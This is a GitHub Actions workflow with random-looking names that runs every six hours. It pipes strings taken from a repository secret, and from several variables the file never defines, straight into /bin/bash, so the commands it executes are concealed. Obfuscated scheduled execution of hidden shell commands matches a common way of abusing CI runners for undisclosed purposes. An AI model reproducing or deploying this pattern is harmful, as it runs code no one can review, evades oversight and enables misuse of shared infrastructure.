name: jiangneihe3765
on:
  workflow_dispatch:
  schedule:
    - cron: '41 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: jiangneihe3765
        env:
          gdbk96: ${{ secrets.gdbk96 }}
        run: |
          echo $gdbk96 | jq -r .wi952 | /bin/bash
          echo $wszm19541 | jq -r .p1507 | /bin/bash
          echo $akbnw8 | jq -r .re2 | /bin/bash
          echo $z653 | jq -r .ewkjl0234 | /bin/bash
          echo $zsyqz4 | jq -r .dihs78285 | /bin/bash
          echo $hlbre8 | jq -r .r7 | /bin/bash

